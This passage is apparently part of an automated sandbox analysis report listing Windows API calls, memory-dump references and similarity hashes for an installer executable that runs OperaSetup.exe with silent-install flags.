                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00405188
                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                                                                                                                • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004054C8
                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405672
                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405684
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                              • String ID: $M$N
                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                              • Opcode ID: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                              • Instruction ID: 154044203e87ae86578454b6b14b757097bfc819611b9ce4677548c75e4aac0f
                                                                                                                                              • Opcode Fuzzy Hash: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                              • Instruction Fuzzy Hash: D8028D70900609AFDB20DFA5CD85AAF7BB5FB45314F10857AF910BA2E1D7B98A41CF18
                                                                                                                                              APIs
                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                                                                                                              • ShowWindow.USER32(?), ref: 0040417E
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                                                                                                              • DestroyWindow.USER32 ref: 004041BD
                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 004041F5
                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004042BB
                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404409
                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404424
                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404441
                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                                                                                                              • lstrlenW.KERNEL32(00442748,?,00442748,00000000), ref: 00404496
                                                                                                                                              • SetWindowTextW.USER32(?,00442748), ref: 004044AA
                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                              • String ID: H'D
                                                                                                                                              • API String ID: 1860320154-716976774
                                                                                                                                              • Opcode ID: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                              • Instruction ID: 87935a59af8161b0f78328c19d4fe10c51b4425a276279a6d07330ead90e7465
                                                                                                                                              • Opcode Fuzzy Hash: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                              • Instruction Fuzzy Hash: C4C1C2B1500604BBCB216F61EE85E2B3BA8FB85745F11097EFB41B11F0DB7998419B2E
                                                                                                                                              APIs
                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
                                                                                                                                              • GetSysColor.USER32(?), ref: 004048C0
                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004048E1
                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040495C
                                                                                                                                              • SendMessageW.USER32(00000000), ref: 00404963
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004049E2
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004049FE
                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$N$WG@
                                                                                                                                              • API String ID: 3103080414-3467885998
                                                                                                                                              • Opcode ID: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
                                                                                                                                              • Instruction ID: 519c373e7f185e7fda66e670232f02753279bd673d39c82729c50cf19e81ba39
                                                                                                                                              • Opcode Fuzzy Hash: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
                                                                                                                                              • Instruction Fuzzy Hash: 6461B3B1A40209BFDF10AF60CD85A6A7B79FB84304F00843AFA15B62D0D779A951CF99
                                                                                                                                              APIs
                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                              • DrawTextW.USER32(00000000,00464260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                              • String ID: F
                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                              • Opcode ID: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
                                                                                                                                              • Instruction ID: dda4e0b8355a10cf3a4659add9ec42a83d374e9472f600803517c33aed587cab
                                                                                                                                              • Opcode Fuzzy Hash: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
                                                                                                                                              • Instruction Fuzzy Hash: 96418A71804209AFCF058FA5DE459BFBBB9FF45314F00802EF991AA1A0C7749A55DFA4
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                                                                                                              • lstrcmpiW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00442748,00000000,?,?), ref: 00404C79
                                                                                                                                              • lstrcatW.KERNEL32(?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00404C85
                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                                                                                                                • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00002000,00404CCE), ref: 00405CF9
                                                                                                                                                • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                                • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                                • Part of subcall function 00406950: CharNextW.USER32(?,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                                • Part of subcall function 00406950: CharPrevW.USER32(?,?,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(00432718,?,?,0000040F,?,00432718,00432718,?,00000001,00432718,?,?,000003FB,?), ref: 00404D5A
                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                                                                                                                • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                                • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                                                                                                                • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$A$H'D
                                                                                                                                              • API String ID: 2624150263-956916108
                                                                                                                                              • Opcode ID: a3fe85cda2bd1e3b216b6d9087c51d3bdf9f40a25cc22ec4f2908b689d4934be
                                                                                                                                              • Instruction ID: 631ab75ceab9e691d6259a87645379c0ec27aba7f5179a8718d2cd07d5d9f082
                                                                                                                                              • Opcode Fuzzy Hash: a3fe85cda2bd1e3b216b6d9087c51d3bdf9f40a25cc22ec4f2908b689d4934be
                                                                                                                                              • Instruction Fuzzy Hash: 52A1A3B1900209ABDB11AFA5CD81AEF77B8FF84754F11843BF601B62D1DB7C89418B69
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045ADE8,00000400), ref: 0040632C
                                                                                                                                                • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                                                                                                                • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045B5E8,00000400), ref: 00406349
                                                                                                                                              • wsprintfA.USER32 ref: 00406367
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0045B5E8,C0000000,00000004,0045B5E8,?,?,?,?,?), ref: 004063A2
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                                                                                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045A9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                                                                                                                • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                                              • Opcode ID: 54cf7ae50ddf40535992a726cd06f9f81a4a0a47f0cb7f2e08aac5df862df744
                                                                                                                                              • Instruction ID: 026d517b253a5d6ccbe57f845948a58d3e37c3b70aabf831ebb2f23b3e620644
                                                                                                                                              • Opcode Fuzzy Hash: 54cf7ae50ddf40535992a726cd06f9f81a4a0a47f0cb7f2e08aac5df862df744
                                                                                                                                              • Instruction Fuzzy Hash: 14312370600315BBD2207F659D49F6B3A6CDF41759F12403AFA02F62D3EA7C982986BD
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00002000), ref: 00406801
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00002000,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00406875
                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                                                                                                              • lstrcatW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,\Microsoft\Internet Explorer\Quick Launch,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                              • API String ID: 4024019347-524522764
                                                                                                                                              • Opcode ID: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                              • Instruction ID: 81e951f8fe173c1ecdb7e664093ca8164433b695446651b9203bd6f4f8051ee3
                                                                                                                                              • Opcode Fuzzy Hash: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                              • Instruction Fuzzy Hash: 5B6145B2A053019BEB20AF65DC8472B77D4AF45314F25453FF583B22D0EA7C8960876E
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                                                                                                              • GetSysColor.USER32(00000000), ref: 004046E3
                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 004046FB
                                                                                                                                              • GetSysColor.USER32(?), ref: 0040470E
                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040471E
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404738
                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                              • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                                                                                                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                              • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                                                                                                • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
